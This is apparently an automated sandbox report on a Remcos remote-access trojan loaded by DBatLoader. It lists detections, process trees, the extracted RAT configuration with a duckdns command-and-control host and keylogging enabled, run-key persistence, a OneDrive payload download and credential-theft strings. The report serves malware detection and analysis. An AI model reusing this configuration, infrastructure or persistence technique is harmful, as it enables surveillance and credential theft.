Windows Analysis Report
fu56fbrtn8.exe

Overview

General Information

Sample name: fu56fbrtn8.exe (renamed because the original name is a hash value)
Original sample name: da7c2473b5c455f25f420827af596286.exe
Analysis ID: 1430790
MD5: da7c2473b5c455f25f420827af596286
SHA1: 101b5f991a26fc9213c4445bd9bfdb87a6a6c5cb
SHA256: e1cecfcc4eed2f4b74af7d971dcf24555534db164ddb0b7cd1e821b2f0402703
Tags: 32, exe, trojan

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Snort IDS alert for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Delayed program exit found
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • fu56fbrtn8.exe (PID: 5592 cmdline: "C:\Users\user\Desktop\fu56fbrtn8.exe" MD5: DA7C2473B5C455F25F420827AF596286)
    • cmd.exe (PID: 4912 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\CmzcxhwnO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 756 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\fu56fbrtn8.exe C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • remcos.exe (PID: 908 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: DA7C2473B5C455F25F420827AF596286)
      • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • remcos.exe (PID: 2508 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\kcrrhbu" MD5: DA7C2473B5C455F25F420827AF596286)
      • remcos.exe (PID: 2916 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\uxwkztfesgm" MD5: DA7C2473B5C455F25F420827AF596286)
      • remcos.exe (PID: 3272 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\fzkcamqygoemct" MD5: DA7C2473B5C455F25F420827AF596286)
      • remcos.exe (PID: 1996 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cidefd" MD5: DA7C2473B5C455F25F420827AF596286)
      • remcos.exe (PID: 332 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\mkqxyvffd" MD5: DA7C2473B5C455F25F420827AF596286)
      • remcos.exe (PID: 3064 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wevpzoqgrjkc" MD5: DA7C2473B5C455F25F420827AF596286)
  • Cmzcxhwn.PIF (PID: 5652 cmdline: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" MD5: DA7C2473B5C455F25F420827AF596286)
  • remcos.exe (PID: 4424 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: DA7C2473B5C455F25F420827AF596286)
  • remcos.exe (PID: 6012 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: DA7C2473B5C455F25F420827AF596286)
  • Cmzcxhwn.PIF (PID: 2700 cmdline: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" MD5: DA7C2473B5C455F25F420827AF596286)
  • remcos.exe (PID: 4692 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: DA7C2473B5C455F25F420827AF596286)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Host:Port:Password": "duckdns.org:1144:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VLI916", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\ProgramData\fgdghrd\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
C:\Users\Public\Libraries\CmzcxhwnO.bat | MALWARE_BAT_KoadicBAT | Koadic post-exploitation framework BAT payload | ditekSHen | Strings:
    • 0x2:$s1: &@cls&@set
    • 0x5b:$s2: :~41,1%%
    • 0x67:$s2: :~47,1%%
    • 0x73:$s2: :~6,1%%
    • 0x7e:$s2: :~53,1%%
    • 0x8a:$s2: :~1,1%
    • 0x9b:$s2: :~10,1%%
    • 0xa7:$s2: :~39,1%%
    • 0xb3:$s2: :~16,1%%
    • 0xbf:$s2: :~13,1%%
    • 0xcb:$s2: :~25,1%%
    • 0xd7:$s2: :~53,1%%
    • 0xe3:$s2: :~42,1%%
    • 0xef:$s2: :~22,1%%
    • 0xfb:$s2: :~18,1%%
    • 0x107:$s2: :~48,1%%
    • 0x113:$s2: :~51,1%%
    • 0x11f:$s2: :~2,1%%
    • 0x12a:$s2: :~61,1%%
    • 0x136:$s2: :~9,1%%
    • 0x141:$s2: :~19,1%%
Source | Rule | Description | Author | Strings
00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
Source | Rule | Description | Author | Strings
0.2.fu56fbrtn8.exe.2d1ce08.1.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
0.2.fu56fbrtn8.exe.2de0000.4.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
0.2.fu56fbrtn8.exe.15680000.10.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0.2.fu56fbrtn8.exe.15680000.10.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0.2.fu56fbrtn8.exe.15680000.10.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown | Strings:
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , CommandLine: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Cmzcxhwn.PIF, NewProcessName: C:\Users\Public\Libraries\Cmzcxhwn.PIF, OriginalFileName: C:\Users\Public\Libraries\Cmzcxhwn.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , ProcessId: 5652, ProcessName: Cmzcxhwn.PIF
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Cmzcxhwn.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\fu56fbrtn8.exe, ProcessId: 5592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cmzcxhwn
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Cmzcxhwn.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\fu56fbrtn8.exe, ProcessId: 5592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cmzcxhwn
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , CommandLine: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Cmzcxhwn.PIF, NewProcessName: C:\Users\Public\Libraries\Cmzcxhwn.PIF, OriginalFileName: C:\Users\Public\Libraries\Cmzcxhwn.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , ProcessId: 5652, ProcessName: Cmzcxhwn.PIF
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\fu56fbrtn8.exe, ProcessId: 5592, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-VLI916

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: DC AE 48 45 2C 57 CE A4 08 F1 18 84 80 0C CF 00 5D C7 7E 93 00 83 31 D4 8A EA C0 18 7A BD E4 42 89 7C C6 83 FC 64 AA D5 50 54 AA 77 C1 C4 B3 01 71 CC F3 39 82 20 DE 28 94 90 E3 8E C9 E2 BB 9B 41 B9 , EventID: 13, EventType: SetValue, Image: C:\ProgramData\Remcos\remcos.exe, ProcessId: 908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-VLI916\exepath

Timestamp: 04/24/24-07:20:40.804567
SID: 2032776
Source Port: 49711
Destination Port: 1144
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 04/24/24-07:23:03.835490
SID: 2032777
Source Port: 1144
Destination Port: 49711
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: http://geoplugin.net/json.gp/C | URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: C:\Users\Public\Libraries\netutils.dll | Avira: detection malicious, Label: TR/AVI.Agent.rqsyc
Source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "duckdns.org:1144:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VLI916", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\ProgramData\Remcos\remcos.exe | ReversingLabs: Detection: 71%
Source: C:\ProgramData\Remcos\remcos.exe | Virustotal: Detection: 73%
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | ReversingLabs: Detection: 71%
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Virustotal: Detection: 73%
Source: C:\Users\Public\Libraries\netutils.dll | ReversingLabs: Detection: 82%
Source: C:\Users\Public\Libraries\netutils.dll | Virustotal: Detection: 67%
Source: fu56fbrtn8.exe | ReversingLabs: Detection: 71%
Source: fu56fbrtn8.exe | Virustotal: Detection: 73%
Source: Yara match | File source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1739100863.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1739100863.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 908, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Cmzcxhwn.PIF PID: 2700, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 4692, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\fgdghrd\logs.dat, type: DROPPED
Source: C:\ProgramData\Remcos\remcos.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Joe Sandbox ML: detected
Source: fu56fbrtn8.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156B3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_156B3837
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AC3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_14AC3837
Source: fu56fbrtn8.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156874FD _wcslen,CoGetObject,0_2_156874FD

Compliance

Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Unpacked PE file: 0.2.fu56fbrtn8.exe.15680000.10.unpack
Source: fu56fbrtn8.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb | source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb | source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
Source: Binary string: easinvoker.pdbH | source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1417481054.00000000150FE000.00000004.00000020.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_15689665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_15689665
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1568C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_1568C34D
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_15689253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_15689253
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_1569C291
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1568BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_1568BD37
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156CE879 FindFirstFileExA,0_2_156CE879
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1568783C FindFirstFileW,FindNextFileW,0_2_1568783C
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1568880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_1568880C
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1568BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_1568BB30
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_15699AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_15699AF5
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DE58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02DE58CC
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 6_2_33A510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_33A510F1
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 6_2_33A56580 FindFirstFileExA,6_2_33A56580
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14ADE879 FindFirstFileExA,8_2_14ADE879
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14A99665 FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_14A99665
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14A9783C FindFirstFileW,FindNextFileW,8_2_14A9783C
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14A9880C FindFirstFileW,FindNextFileW,FindClose,8_2_14A9880C
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AAC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_14AAC291
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AA9AF5 FindFirstFileW,8_2_14AA9AF5
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14A9BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_14A9BB30
Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14A9C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_14A9C34D
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_15687C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_15687C97

Networking

Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.8:49711 -> 103.186.117.142:1144
Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 103.186.117.142:1144 -> 192.168.2.8:49711
Source: Malware configuration extractor | URLs: duckdns.org
Source: unknown | DNS query: name: oceansss.duckdns.org
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DFC8AC InternetCheckConnectionA,0_2_02DFC8AC
Source: global traffic | TCP traffic: 192.168.2.8:49711 -> 103.186.117.142:1144
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 13.107.139.11
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569662D Sleep,URLDownloadToFileW,0_2_1569662D
                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: remcos.exe, 00000009.00000002.1583028383.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.1631551774.0000000002328000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
